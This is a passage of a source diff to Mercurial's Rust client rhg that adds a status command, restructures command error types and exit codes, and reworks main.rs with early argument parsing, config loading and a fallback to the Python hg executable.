+ removed: args.is_present("removed"),
+ clean: args.is_present("clean"),
+ deleted: args.is_present("deleted"),
+ unknown: args.is_present("unknown"),
+ ignored: args.is_present("ignored"),
+ };
+ if requested.is_empty() {
+ DEFAULT_DISPLAY_STATES
+ } else {
+ requested
+ }
+ };
+
+ let repo = invocation.repo?;
+ let mut dmap = DirstateMap::new();
+ let dirstate_data = repo.hg_vfs().mmap_open("dirstate")?;
+ let parents = dmap.read(&dirstate_data)?;
+ let options = StatusOptions {
+ // TODO should be provided by the dirstate parsing and
+ // hence be stored on dmap. Using a value that assumes we aren't
+ // below the time resolution granularity of the FS and the
+ // dirstate.
+ last_normal_time: 0,
+ // we're currently supporting file systems with exec flags only
+ // anyway
+ check_exec: true,
+ list_clean: display_states.clean,
+ list_unknown: display_states.unknown,
+ list_ignored: display_states.ignored,
+ collect_traversed_dirs: false,
+ };
+ let ignore_file = repo.working_directory_vfs().join(".hgignore"); // TODO hardcoded
+ let ((lookup, ds_status), pattern_warnings) = hg::status(
+ &dmap,
+ &AlwaysMatcher,
+ repo.working_directory_path().to_owned(),
+ vec![ignore_file],
+ options,
+ )?;
+ if !pattern_warnings.is_empty() {
+ warn!("Pattern warnings: {:?}", &pattern_warnings);
+ }
+
+ if !ds_status.bad.is_empty() {
+ warn!("Bad matches {:?}", &(ds_status.bad))
+ }
+ if !lookup.is_empty() {
+ info!(
+ "Files to be rechecked by retrieval from filelog: {:?}",
+ &lookup
+ );
+ }
+ // TODO check ordering to match `hg status` output.
+ // (this is as in `hg help status`)
+ if display_states.modified {
+ display_status_paths(ui, &(ds_status.modified), b"M")?;
+ }
+ if !lookup.is_empty() {
+ let p1: Node = parents
+ .expect(
+ "Dirstate with no parents should not list any file to
+ be rechecked for modifications",
+ )
+ .p1
+ .into();
+ let p1_hex = format!("{:x}", p1);
+ let mut rechecked_modified: Vec<HgPathCow> = Vec::new();
+ let mut rechecked_clean: Vec<HgPathCow> = Vec::new();
+ for to_check in lookup {
+ if cat_file_is_modified(repo, &to_check, &p1_hex)? {
+ rechecked_modified.push(to_check);
+ } else {
+ rechecked_clean.push(to_check);
+ }
+ }
+ if display_states.modified {
+ display_status_paths(ui, &rechecked_modified, b"M")?;
+ }
+ if display_states.clean {
+ display_status_paths(ui, &rechecked_clean, b"C")?;
+ }
+ }
+ if display_states.added {
+ display_status_paths(ui, &(ds_status.added), b"A")?;
+ }
+ if display_states.clean {
+ display_status_paths(ui, &(ds_status.clean), b"C")?;
+ }
+ if display_states.removed {
+ display_status_paths(ui, &(ds_status.removed), b"R")?;
+ }
+ if display_states.deleted {
+ display_status_paths(ui, &(ds_status.deleted), b"!")?;
+ }
+ if display_states.unknown {
+ display_status_paths(ui, &(ds_status.unknown), b"?")?;
+ }
+ if display_states.ignored {
+ display_status_paths(ui, &(ds_status.ignored), b"I")?;
+ }
+ Ok(())
+}
+
+// Probably more elegant to use a Deref or Borrow trait rather than
+// harcode HgPathBuf, but probably not really useful at this point
+fn display_status_paths(
+ ui: &Ui,
+ paths: &[HgPathCow],
+ status_prefix: &[u8],
+) -> Result<(), CommandError> {
+ for path in paths {
+ // Same TODO as in commands::root
+ let bytes: &[u8] = path.as_bytes();
+ // TODO optim, probably lots of unneeded copies here, especially
+ // if out stream is buffered
+ ui.write_stdout(&[status_prefix, b" ", bytes, b"\n"].concat())?;
+ }
+ Ok(())
+}
+
+/// Check if a file is modified by comparing actual repo store and file system.
+///
+/// This meant to be used for those that the dirstate cannot resolve, due
+/// to time resolution limits.
+///
+/// TODO: detect permission bits and similar metadata modifications
+fn cat_file_is_modified(
+ repo: &Repo,
+ hg_path: &HgPath,
+ rev: &str,
+) -> Result<bool, CommandError> {
+ // TODO CatRev expects &[HgPathBuf], something like
+ // &[impl Deref<HgPath>] would be nicer and should avoid the copy
+ let path_bufs = [hg_path.into()];
+ // TODO IIUC CatRev returns a simple Vec<u8> for all files
+ // being able to tell them apart as (path, bytes) would be nicer
+ // and OPTIM would allow manifest resolution just once.
+ let output = cat(repo, rev, &path_bufs).map_err(|e| (e, rev))?;
+
+ let fs_path = repo
+ .working_directory_vfs()
+ .join(hg_path_to_os_string(hg_path).expect("HgPath conversion"));
+ let hg_data_len: u64 = match output.concatenated.len().try_into() {
+ Ok(v) => v,
+ Err(_) => {
+ // conversion of data length to u64 failed,
+ // good luck for any file to have this content
+ return Ok(true);
+ }
+ };
+ let fobj = fs::File::open(&fs_path).when_reading_file(&fs_path)?;
+ if fobj.metadata().map_err(|e| StatusError::from(e))?.len() != hg_data_len
+ {
+ return Ok(true);
+ }
+ for (fs_byte, hg_byte) in
+ BufReader::new(fobj).bytes().zip(output.concatenated)
+ {
+ if fs_byte.map_err(|e| StatusError::from(e))? != hg_byte {
+ return Ok(true);
+ }
+ }
+ Ok(false)
+}
--- a/rust/rhg/src/error.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/rhg/src/error.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,124 +1,195 @@
use crate::exitcode;
+use crate::ui::utf8_to_local;
use crate::ui::UiError;
+use crate::NoRepoInCwdError;
use format_bytes::format_bytes;
-use hg::operations::{FindRootError, FindRootErrorKind};
-use hg::requirements::RequirementsError;
+use hg::config::{ConfigError, ConfigParseError, ConfigValueParseError};
+use hg::errors::HgError;
+use hg::repo::RepoError;
+use hg::revlog::revlog::RevlogError;
use hg::utils::files::get_bytes_from_path;
+use hg::{DirstateError, DirstateMapError, StatusError};
use std::convert::From;
-use std::path::PathBuf;
/// The kind of command error
#[derive(Debug)]
-pub enum CommandErrorKind {
- /// The root of the repository cannot be found
- RootNotFound(PathBuf),
- /// The current directory cannot be found
- CurrentDirNotFound(std::io::Error),
- /// `.hg/requires`
- RequirementsError(RequirementsError),
- /// The standard output stream cannot be written to
- StdoutError,
- /// The standard error stream cannot be written to
- StderrError,
- /// The command aborted
- Abort(Option<Vec<u8>>),
- /// A mercurial capability as not been implemented.
- Unimplemented,
+pub enum CommandError {
+ /// Exit with an error message and "standard" failure exit code.
+ Abort {
+ message: Vec<u8>,
+ detailed_exit_code: exitcode::ExitCode,
+ },
+
+ /// Exit with a failure exit code but no message.
+ Unsuccessful,
+
+ /// Encountered something (such as a CLI argument, repository layout, …)
+ /// not supported by this version of `rhg`. Depending on configuration
+ /// `rhg` may attempt to silently fall back to Python-based `hg`, which
+ /// may or may not support this feature.
+ UnsupportedFeature { message: Vec<u8> },
}
-impl CommandErrorKind {
- pub fn get_exit_code(&self) -> exitcode::ExitCode {
- match self {
- CommandErrorKind::RootNotFound(_) => exitcode::ABORT,
- CommandErrorKind::CurrentDirNotFound(_) => exitcode::ABORT,
- CommandErrorKind::RequirementsError(
- RequirementsError::Unsupported { .. },
- ) => exitcode::UNIMPLEMENTED_COMMAND,
- CommandErrorKind::RequirementsError(_) => exitcode::ABORT,
- CommandErrorKind::StdoutError => exitcode::ABORT,
- CommandErrorKind::StderrError => exitcode::ABORT,
- CommandErrorKind::Abort(_) => exitcode::ABORT,
- CommandErrorKind::Unimplemented => exitcode::UNIMPLEMENTED_COMMAND,
+impl CommandError {
+ pub fn abort(message: impl AsRef<str>) -> Self {
+ CommandError::abort_with_exit_code(message, exitcode::ABORT)
+ }
+
+ pub fn abort_with_exit_code(
+ message: impl AsRef<str>,
+ detailed_exit_code: exitcode::ExitCode,
+ ) -> Self {
+ CommandError::Abort {
+ // TODO: bytes-based (instead of Unicode-based) formatting
+ // of error messages to handle non-UTF-8 filenames etc:
+ // https://www.mercurial-scm.org/wiki/EncodingStrategy#Mixing_output
+ message: utf8_to_local(message.as_ref()).into(),
+ detailed_exit_code: detailed_exit_code,
}
}
- /// Return the message corresponding to the error kind if any
- pub fn get_error_message_bytes(&self) -> Option<Vec<u8>> {
- match self {
- CommandErrorKind::RootNotFound(path) => {
- let bytes = get_bytes_from_path(path);
- Some(format_bytes!(
- b"abort: no repository found in '{}' (.hg not found)!\n",
- bytes.as_slice()
- ))
+ pub fn unsupported(message: impl AsRef<str>) -> Self {
+ CommandError::UnsupportedFeature {
+ message: utf8_to_local(message.as_ref()).into(),
+ }
+ }
+}
+
+/// For now we don’t differenciate between invalid CLI args and valid for `hg`
+/// but not supported yet by `rhg`.
+impl From<clap::Error> for CommandError {
+ fn from(error: clap::Error) -> Self {
+ CommandError::unsupported(error.to_string())
+ }
+}
+
+impl From<HgError> for CommandError {
+ fn from(error: HgError) -> Self {
+ match error {
+ HgError::UnsupportedFeature(message) => {
+ CommandError::unsupported(message)
}
- CommandErrorKind::CurrentDirNotFound(e) => Some(format_bytes!(
- b"abort: error getting current working directory: {}\n",
- e.to_string().as_bytes(),
- )),
- CommandErrorKind::RequirementsError(
- RequirementsError::Corrupted,
- ) => Some(
- "abort: .hg/requires is corrupted\n".as_bytes().to_owned(),
- ),
- CommandErrorKind::Abort(message) => message.to_owned(),
- _ => None,
+ _ => CommandError::abort(error.to_string()),
}
}
}
-/// The error type for the Command trait
-#[derive(Debug)]
-pub struct CommandError {
- pub kind: CommandErrorKind,
-}
-
-impl CommandError {
- /// Exist the process with the corresponding exit code.
- pub fn exit(&self) {
- std::process::exit(self.kind.get_exit_code())
- }
-
- /// Return the message corresponding to the command error if any
- pub fn get_error_message_bytes(&self) -> Option<Vec<u8>> {
- self.kind.get_error_message_bytes()
- }
-}
-
-impl From<CommandErrorKind> for CommandError {
- fn from(kind: CommandErrorKind) -> Self {
- CommandError { kind }
+impl From<ConfigValueParseError> for CommandError {
+ fn from(error: ConfigValueParseError) -> Self {
+ CommandError::abort_with_exit_code(
+ error.to_string(),
+ exitcode::CONFIG_ERROR_ABORT,
+ )
}
}
impl From<UiError> for CommandError {
- fn from(error: UiError) -> Self {
- CommandError {
- kind: match error {
- UiError::StdoutError(_) => CommandErrorKind::StdoutError,
- UiError::StderrError(_) => CommandErrorKind::StderrError,
+ fn from(_error: UiError) -> Self {
+ // If we already failed writing to stdout or stderr,
+ // writing an error message to stderr about it would be likely to fail
+ // too.
+ CommandError::abort("")
+ }
+}
+
+impl From<RepoError> for CommandError {
+ fn from(error: RepoError) -> Self {
+ match error {
+ RepoError::NotFound { at } => CommandError::Abort {
+ message: format_bytes!(
+ b"abort: repository {} not found",
+ get_bytes_from_path(at)
+ ),
+ detailed_exit_code: exitcode::ABORT,
},
+ RepoError::ConfigParseError(error) => error.into(),
+ RepoError::Other(error) => error.into(),
+ }
+ }
+}
+
+impl<'a> From<&'a NoRepoInCwdError> for CommandError {
+ fn from(error: &'a NoRepoInCwdError) -> Self {
+ let NoRepoInCwdError { cwd } = error;
+ CommandError::Abort {
+ message: format_bytes!(
+ b"abort: no repository found in '{}' (.hg not found)!",
+ get_bytes_from_path(cwd)
+ ),
+ detailed_exit_code: exitcode::ABORT,
+ }
+ }
+}
+
+impl From<ConfigError> for CommandError {
+ fn from(error: ConfigError) -> Self {
+ match error {
+ ConfigError::Parse(error) => error.into(),
+ ConfigError::Other(error) => error.into(),
}
}
}
-impl From<FindRootError> for CommandError {
- fn from(err: FindRootError) -> Self {
- match err.kind {
- FindRootErrorKind::RootNotFound(path) => CommandError {
- kind: CommandErrorKind::RootNotFound(path),
- },
- FindRootErrorKind::GetCurrentDirError(e) => CommandError {
- kind: CommandErrorKind::CurrentDirNotFound(e),
- },
+impl From<ConfigParseError> for CommandError {
+ fn from(error: ConfigParseError) -> Self {
+ let ConfigParseError {
+ origin,
+ line,
+ message,
+ } = error;
+ let line_message = if let Some(line_number) = line {
+ format_bytes!(b":{}", line_number.to_string().into_bytes())
+ } else {
+ Vec::new()
+ };
+ CommandError::Abort {
+ message: format_bytes!(
+ b"config error at {}{}: {}",
+ origin,
+ line_message,
+ message
+ ),
+ detailed_exit_code: exitcode::CONFIG_ERROR_ABORT,
}
}
}
-impl From<RequirementsError> for CommandError {
- fn from(err: RequirementsError) -> Self {
- CommandError {
- kind: CommandErrorKind::RequirementsError(err),
+impl From<(RevlogError, &str)> for CommandError {
+ fn from((err, rev): (RevlogError, &str)) -> CommandError {
+ match err {
+ RevlogError::WDirUnsupported => CommandError::abort(
+ "abort: working directory revision cannot be specified",
+ ),
+ RevlogError::InvalidRevision => CommandError::abort(format!(
+ "abort: invalid revision identifier: {}",
+ rev
+ )),
+ RevlogError::AmbiguousPrefix => CommandError::abort(format!(
+ "abort: ambiguous revision identifier: {}",
+ rev
+ )),
+ RevlogError::Other(error) => error.into(),
}
}
}
+
+impl From<StatusError> for CommandError {
+ fn from(error: StatusError) -> Self {
+ CommandError::abort(format!("{}", error))
+ }
+}
+
+impl From<DirstateMapError> for CommandError {
+ fn from(error: DirstateMapError) -> Self {
+ CommandError::abort(format!("{}", error))
+ }
+}
+
+impl From<DirstateError> for CommandError {
+ fn from(error: DirstateError) -> Self {
+ match error {
+ DirstateError::Common(error) => error.into(),
+ DirstateError::Map(error) => error.into(),
+ }
+ }
+}
--- a/rust/rhg/src/exitcode.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/rhg/src/exitcode.rs Tue Apr 20 11:01:06 2021 -0400
@@ -6,5 +6,11 @@
/// Generic abort
pub const ABORT: ExitCode = 255;
-/// Command not implemented by rhg
-pub const UNIMPLEMENTED_COMMAND: ExitCode = 252;
+// Abort when there is a config related error
+pub const CONFIG_ERROR_ABORT: ExitCode = 30;
+
+/// Generic something completed but did not succeed
+pub const UNSUCCESSFUL: ExitCode = 1;
+
+/// Command or feature not implemented by rhg
+pub const UNIMPLEMENTED: ExitCode = 252;
--- a/rust/rhg/src/main.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/rhg/src/main.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,185 +1,509 @@
extern crate log;
+use crate::ui::Ui;
use clap::App;
use clap::AppSettings;
use clap::Arg;
-use clap::ArgGroup;
use clap::ArgMatches;
-use clap::SubCommand;
-use hg::operations::DebugDataKind;
-use std::convert::TryFrom;
+use format_bytes::{format_bytes, join};
+use hg::config::Config;
+use hg::repo::{Repo, RepoError};
+use hg::utils::files::{get_bytes_from_os_str, get_path_from_bytes};
+use hg::utils::SliceExt;
+use std::ffi::OsString;
+use std::path::PathBuf;
+use std::process::Command;
-mod commands;
+mod blackbox;
mod error;
mod exitcode;
mod ui;
-use commands::Command;
use error::CommandError;
-fn main() {
- env_logger::init();
+fn main_with_result(
+ process_start_time: &blackbox::ProcessStartTime,
+ ui: &ui::Ui,
+ repo: Result<&Repo, &NoRepoInCwdError>,
+ config: &Config,
+) -> Result<(), CommandError> {
+ check_extensions(config)?;
+
let app = App::new("rhg")
- .setting(AppSettings::AllowInvalidUtf8)
+ .global_setting(AppSettings::AllowInvalidUtf8)
+ .global_setting(AppSettings::DisableVersion)
.setting(AppSettings::SubcommandRequired)
.setting(AppSettings::VersionlessSubcommands)
- .version("0.0.1")
- .subcommand(
- SubCommand::with_name("root").about(commands::root::HELP_TEXT),
- )
- .subcommand(
- SubCommand::with_name("files")
- .arg(
- Arg::with_name("rev")
- .help("search the repository as it is in REV")
- .short("-r")
- .long("--revision")
- .value_name("REV")
- .takes_value(true),
- )
- .about(commands::files::HELP_TEXT),
+ .arg(
+ Arg::with_name("repository")
+ .help("repository root directory")
+ .short("-R")
+ .long("--repository")
+ .value_name("REPO")
+ .takes_value(true)
+ // Both ok: `hg -R ./foo log` or `hg log -R ./foo`
+ .global(true),
)
- .subcommand(
- SubCommand::with_name("cat")
- .arg(
- Arg::with_name("rev")
- .help("search the repository as it is in REV")
- .short("-r")
- .long("--revision")
- .value_name("REV")
- .takes_value(true),
- )
- .arg(
- clap::Arg::with_name("files")
- .required(true)
- .multiple(true)
- .empty_values(false)
- .value_name("FILE")
- .help("Activity to start: activity@category"),
- )
- .about(commands::cat::HELP_TEXT),
+ .arg(
+ Arg::with_name("config")
+ .help("set/override config option (use 'section.name=value')")
+ .long("--config")
+ .value_name("CONFIG")
+ .takes_value(true)
+ .global(true)
+ // Ok: `--config section.key1=val --config section.key2=val2`
+ .multiple(true)
+ // Not ok: `--config section.key1=val section.key2=val2`
+ .number_of_values(1),
+ )
+ .arg(
+ Arg::with_name("cwd")
+ .help("change working directory")
+ .long("--cwd")
+ .value_name("DIR")
+ .takes_value(true)
+ .global(true),
)
- .subcommand(
- SubCommand::with_name("debugdata")
- .about(commands::debugdata::HELP_TEXT)
- .arg(
- Arg::with_name("changelog")
- .help("open changelog")
- .short("-c")
- .long("--changelog"),
- )
- .arg(
- Arg::with_name("manifest")
- .help("open manifest")
- .short("-m")
- .long("--manifest"),
+ .version("0.0.1");
+ let app = add_subcommand_args(app);
+
+ let matches = app.clone().get_matches_safe()?;
+
+ let (subcommand_name, subcommand_matches) = matches.subcommand();
+ let run = subcommand_run_fn(subcommand_name)
+ .expect("unknown subcommand name from clap despite AppSettings::SubcommandRequired");
+ let subcommand_args = subcommand_matches
+ .expect("no subcommand arguments from clap despite AppSettings::SubcommandRequired");
+
+ let invocation = CliInvocation {
+ ui,
+ subcommand_args,
+ config,
+ repo,
+ };
+ let blackbox = blackbox::Blackbox::new(&invocation, process_start_time)?;
+ blackbox.log_command_start();
+ let result = run(&invocation);
+ blackbox.log_command_end(exit_code(
+ &result,
+ // TODO: show a warning or combine with original error if `get_bool`
+ // returns an error
+ config
+ .get_bool(b"ui", b"detailed-exit-code")
+ .unwrap_or(false),
+ ));
+ result
+}
+
+fn main() {
+ // Run this first, before we find out if the blackbox extension is even
+ // enabled, in order to include everything in-between in the duration
+ // measurements. Reading config files can be slow if they’re on NFS.
+ let process_start_time = blackbox::ProcessStartTime::now();
+
+ env_logger::init();
+ let ui = ui::Ui::new();
+
+ let early_args = EarlyArgs::parse(std::env::args_os());
+
+ let initial_current_dir = early_args.cwd.map(|cwd| {
+ let cwd = get_path_from_bytes(&cwd);
+ std::env::current_dir()
+ .and_then(|initial| {
+ std::env::set_current_dir(cwd)?;
+ Ok(initial)
+ })
+ .unwrap_or_else(|error| {
+ exit(
+ &None,
+ &ui,
+ OnUnsupported::Abort,
+ Err(CommandError::abort(format!(
+ "abort: {}: '{}'",
+ error,
+ cwd.display()
+ ))),
+ false,
)
- .group(
- ArgGroup::with_name("")
- .args(&["changelog", "manifest"])
- .required(true),
- )
- .arg(
- Arg::with_name("rev")
- .help("revision")
- .required(true)
- .value_name("REV"),
- ),
- )
- .subcommand(
- SubCommand::with_name("debugrequirements")
- .about(commands::debugrequirements::HELP_TEXT),
- );
-
- let matches = app.clone().get_matches_safe().unwrap_or_else(|err| {
- let _ = ui::Ui::new().writeln_stderr_str(&err.message);
- std::process::exit(exitcode::UNIMPLEMENTED_COMMAND)
+ })
});
- let ui = ui::Ui::new();
+ let non_repo_config =
+ Config::load(early_args.config).unwrap_or_else(|error| {
+ // Normally this is decided based on config, but we don’t have that
+ // available. As of this writing config loading never returns an
+ // "unsupported" error but that is not enforced by the type system.
+ let on_unsupported = OnUnsupported::Abort;
- let command_result = match_subcommand(matches, &ui);
+ exit(
+ &initial_current_dir,
+ &ui,
+ on_unsupported,
+ Err(error.into()),
+ false,
+ )
+ });
- match command_result {
- Ok(_) => std::process::exit(exitcode::OK),
- Err(e) => {
- let message = e.get_error_message_bytes();
- if let Some(msg) = message {
- match ui.write_stderr(&msg) {
- Ok(_) => (),
- Err(_) => std::process::exit(exitcode::ABORT),
- };
- };
- e.exit()
+ if let Some(repo_path_bytes) = &early_args.repo {
+ lazy_static::lazy_static! {
+ static ref SCHEME_RE: regex::bytes::Regex =
+ // Same as `_matchscheme` in `mercurial/util.py`
+ regex::bytes::Regex::new("^[a-zA-Z0-9+.\\-]+:").unwrap();
+ }
+ if SCHEME_RE.is_match(&repo_path_bytes) {
+ exit(
+ &initial_current_dir,
+ &ui,
+ OnUnsupported::from_config(&ui, &non_repo_config),
+ Err(CommandError::UnsupportedFeature {
+ message: format_bytes!(
+ b"URL-like --repository {}",
+ repo_path_bytes
+ ),
+ }),
+ // TODO: show a warning or combine with original error if
+ // `get_bool` returns an error
+ non_repo_config
+ .get_bool(b"ui", b"detailed-exit-code")
+ .unwrap_or(false),
+ )
+ }
+ }
+ let repo_path = early_args.repo.as_deref().map(get_path_from_bytes);
+ let repo_result = match Repo::find(&non_repo_config, repo_path) {
+ Ok(repo) => Ok(repo),
+ Err(RepoError::NotFound { at }) if repo_path.is_none() => {
+ // Not finding a repo is not fatal yet, if `-R` was not given
+ Err(NoRepoInCwdError { cwd: at })
+ }
+ Err(error) => exit(
+ &initial_current_dir,
+ &ui,
+ OnUnsupported::from_config(&ui, &non_repo_config),
+ Err(error.into()),
+ // TODO: show a warning or combine with original error if
+ // `get_bool` returns an error
+ non_repo_config
+ .get_bool(b"ui", b"detailed-exit-code")
+ .unwrap_or(false),
+ ),
+ };
+
+ let config = if let Ok(repo) = &repo_result {
+ repo.config()
+ } else {
+ &non_repo_config
+ };
+ let on_unsupported = OnUnsupported::from_config(&ui, config);
+
+ let result = main_with_result(
+ &process_start_time,
+ &ui,
+ repo_result.as_ref(),
+ config,
+ );
+ exit(
+ &initial_current_dir,
+ &ui,
+ on_unsupported,
+ result,
+ // TODO: show a warning or combine with original error if `get_bool`
+ // returns an error
+ config
+ .get_bool(b"ui", b"detailed-exit-code")
+ .unwrap_or(false),
+ )
+}
+
+fn exit_code(
+ result: &Result<(), CommandError>,
+ use_detailed_exit_code: bool,
+) -> i32 {
+ match result {
+ Ok(()) => exitcode::OK,
+ Err(CommandError::Abort {
+ message: _,
+ detailed_exit_code,
+ }) => {
+ if use_detailed_exit_code {
+ *detailed_exit_code
+ } else {
+ exitcode::ABORT
+ }
+ }
+ Err(CommandError::Unsuccessful) => exitcode::UNSUCCESSFUL,
+
+ // Exit with a specific code and no error message to let a potential
+ // wrapper script fallback to Python-based Mercurial.
+ Err(CommandError::UnsupportedFeature { .. }) => {
+ exitcode::UNIMPLEMENTED
}
}
}
-fn match_subcommand(
- matches: ArgMatches,
- ui: &ui::Ui,
-) -> Result<(), CommandError> {
- match matches.subcommand() {
- ("root", _) => commands::root::RootCommand::new().run(&ui),
- ("files", Some(matches)) => {
- commands::files::FilesCommand::try_from(matches)?.run(&ui)
+fn exit(
+ initial_current_dir: &Option<PathBuf>,
+ ui: &Ui,
+ mut on_unsupported: OnUnsupported,
+ result: Result<(), CommandError>,
+ use_detailed_exit_code: bool,
+) -> ! {
+ if let (
+ OnUnsupported::Fallback { executable },
+ Err(CommandError::UnsupportedFeature { .. }),
+ ) = (&on_unsupported, &result)
+ {
+ let mut args = std::env::args_os();
+ let executable_path = get_path_from_bytes(&executable);
+ let this_executable = args.next().expect("exepcted argv[0] to exist");
+ if executable_path == &PathBuf::from(this_executable) {
+ // Avoid spawning infinitely many processes until resource
+ // exhaustion.
+ let _ = ui.write_stderr(&format_bytes!(
+ b"Blocking recursive fallback. The 'rhg.fallback-executable = {}' config \
+ points to `rhg` itself.\n",
+ executable
+ ));
+ on_unsupported = OnUnsupported::Abort
+ } else {
+ // `args` is now `argv[1..]` since we’ve already consumed `argv[0]`
+ let mut command = Command::new(executable_path);
+ command.args(args);
+ if let Some(initial) = initial_current_dir {
+ command.current_dir(initial);
+ }
+ let result = command.status();
+ match result {
+ Ok(status) => std::process::exit(
+ status.code().unwrap_or(exitcode::ABORT),
+ ),
+ Err(error) => {
+ let _ = ui.write_stderr(&format_bytes!(
+ b"tried to fall back to a '{}' sub-process but got error {}\n",
+ executable, format_bytes::Utf8(error)
+ ));
+ on_unsupported = OnUnsupported::Abort
+ }
+ }
}
- ("cat", Some(matches)) => {
- commands::cat::CatCommand::try_from(matches)?.run(&ui)
- }
- ("debugdata", Some(matches)) => {
- commands::debugdata::DebugDataCommand::try_from(matches)?.run(&ui)
+ }
+ exit_no_fallback(ui, on_unsupported, result, use_detailed_exit_code)
+}
+
+fn exit_no_fallback(
+ ui: &Ui,
+ on_unsupported: OnUnsupported,
+ result: Result<(), CommandError>,
+ use_detailed_exit_code: bool,
+) -> ! {
+ match &result {
+ Ok(_) => {}
+ Err(CommandError::Unsuccessful) => {}
+ Err(CommandError::Abort {
+ message,
+ detailed_exit_code: _,
+ }) => {
+ if !message.is_empty() {
+ // Ignore errors when writing to stderr, we’re already exiting
+ // with failure code so there’s not much more we can do.
+ let _ = ui.write_stderr(&format_bytes!(b"{}\n", message));
+ }
}
- ("debugrequirements", _) => {
- commands::debugrequirements::DebugRequirementsCommand::new()
- .run(&ui)
+ Err(CommandError::UnsupportedFeature { message }) => {
+ match on_unsupported {
+ OnUnsupported::Abort => {
+ let _ = ui.write_stderr(&format_bytes!(
+ b"unsupported feature: {}\n",
+ message
+ ));
+ }
+ OnUnsupported::AbortSilent => {}
+ OnUnsupported::Fallback { .. } => unreachable!(),
+ }
}
- _ => unreachable!(), // Because of AppSettings::SubcommandRequired,
}
+ std::process::exit(exit_code(&result, use_detailed_exit_code))
}
-impl<'a> TryFrom<&'a ArgMatches<'_>> for commands::files::FilesCommand<'a> {
- type Error = CommandError;
+macro_rules! subcommands {
+ ($( $command: ident )+) => {
+ mod commands {
+ $(
+ pub mod $command;
+ )+
+ }
+
+ fn add_subcommand_args<'a, 'b>(app: App<'a, 'b>) -> App<'a, 'b> {
+ app
+ $(
+ .subcommand(commands::$command::args())
+ )+
+ }
+
+ pub type RunFn = fn(&CliInvocation) -> Result<(), CommandError>;
+
+ fn subcommand_run_fn(name: &str) -> Option<RunFn> {
+ match name {
+ $(
+ stringify!($command) => Some(commands::$command::run),
+ )+
+ _ => None,
+ }
+ }
+ };
+}
+
+subcommands! {
+ cat
+ debugdata
+ debugrequirements
+ files
+ root
+ config
+ status
+}
+
+pub struct CliInvocation<'a> {
+ ui: &'a Ui,
+ subcommand_args: &'a ArgMatches<'a>,
+ config: &'a Config,
+ /// References inside `Result` is a bit peculiar but allow
+ /// `invocation.repo?` to work out with `&CliInvocation` since this
+ /// `Result` type is `Copy`.
+ repo: Result<&'a Repo, &'a NoRepoInCwdError>,
+}
+
+struct NoRepoInCwdError {
+ cwd: PathBuf,
+}
- fn try_from(args: &'a ArgMatches) -> Result<Self, Self::Error> {
- let rev = args.value_of("rev");
- Ok(commands::files::FilesCommand::new(rev))
+/// CLI arguments to be parsed "early" in order to be able to read
+/// configuration before using Clap. Ideally we would also use Clap for this,
+/// see <https://github.com/clap-rs/clap/discussions/2366>.
+///
+/// These arguments are still declared when we do use Clap later, so that Clap
+/// does not return an error for their presence.
+struct EarlyArgs {
+ /// Values of all `--config` arguments. (Possibly none)
+ config: Vec<Vec<u8>>,
+ /// Value of the `-R` or `--repository` argument, if any.
+ repo: Option<Vec<u8>>,
+ /// Value of the `--cwd` argument, if any.
+ cwd: Option<Vec<u8>>,
+}
+
+impl EarlyArgs {
+ fn parse(args: impl IntoIterator<Item = OsString>) -> Self {
+ let mut args = args.into_iter().map(get_bytes_from_os_str);
+ let mut config = Vec::new();
+ let mut repo = None;
+ let mut cwd = None;
+ // Use `while let` instead of `for` so that we can also call
+ // `args.next()` inside the loop.
+ while let Some(arg) = args.next() {
+ if arg == b"--config" {
+ if let Some(value) = args.next() {
+ config.push(value)
+ }
+ } else if let Some(value) = arg.drop_prefix(b"--config=") {
+ config.push(value.to_owned())
+ }
+
+ if arg == b"--cwd" {
+ if let Some(value) = args.next() {
+ cwd = Some(value)
+ }
+ } else if let Some(value) = arg.drop_prefix(b"--cwd=") {
+ cwd = Some(value.to_owned())
+ }
+
+ if arg == b"--repository" || arg == b"-R" {
+ if let Some(value) = args.next() {
+ repo = Some(value)
+ }
+ } else if let Some(value) = arg.drop_prefix(b"--repository=") {
+ repo = Some(value.to_owned())
+ } else if let Some(value) = arg.drop_prefix(b"-R") {
+ repo = Some(value.to_owned())
+ }
+ }
+ Self { config, repo, cwd }
}
}
-impl<'a> TryFrom<&'a ArgMatches<'_>> for commands::cat::CatCommand<'a> {
- type Error = CommandError;
+/// What to do when encountering some unsupported feature.
+///
+/// See `HgError::UnsupportedFeature` and `CommandError::UnsupportedFeature`.
+enum OnUnsupported {
+ /// Print an error message describing what feature is not supported,
+ /// and exit with code 252.
+ Abort,
+ /// Silently exit with code 252.
+ AbortSilent,
+ /// Try running a Python implementation
+ Fallback { executable: Vec<u8> },
+}
+
+impl OnUnsupported {
+ const DEFAULT: Self = OnUnsupported::Abort;
- fn try_from(args: &'a ArgMatches) -> Result<Self, Self::Error> {
- let rev = args.value_of("rev");
- let files = match args.values_of("files") {
- Some(files) => files.collect(),
- None => vec![],
- };
- Ok(commands::cat::CatCommand::new(rev, files))
+ fn from_config(ui: &Ui, config: &Config) -> Self {
+ match config
+ .get(b"rhg", b"on-unsupported")
+ .map(|value| value.to_ascii_lowercase())
+ .as_deref()
+ {
+ Some(b"abort") => OnUnsupported::Abort,
+ Some(b"abort-silent") => OnUnsupported::AbortSilent,
+ Some(b"fallback") => OnUnsupported::Fallback {
+ executable: config
+ .get(b"rhg", b"fallback-executable")
+ .unwrap_or_else(|| {
+ exit_no_fallback(
+ ui,
+ Self::Abort,
+ Err(CommandError::abort(
+ "abort: 'rhg.on-unsupported=fallback' without \
+ 'rhg.fallback-executable' set."
+ )),
+ false,
+ )
+ })
+ .to_owned(),
+ },
+ None => Self::DEFAULT,
+ Some(_) => {
+ // TODO: warn about unknown config value
+ Self::DEFAULT
+ }
+ }
}
}
-impl<'a> TryFrom<&'a ArgMatches<'_>>
- for commands::debugdata::DebugDataCommand<'a>
-{
- type Error = CommandError;
+const SUPPORTED_EXTENSIONS: &[&[u8]] = &[b"blackbox", b"share"];
+
+fn check_extensions(config: &Config) -> Result<(), CommandError> {
+ let enabled = config.get_section_keys(b"extensions");
+
+ let mut unsupported = enabled;
+ for supported in SUPPORTED_EXTENSIONS {
+ unsupported.remove(supported);
+ }
- fn try_from(args: &'a ArgMatches) -> Result<Self, Self::Error> {
- let rev = args
- .value_of("rev")
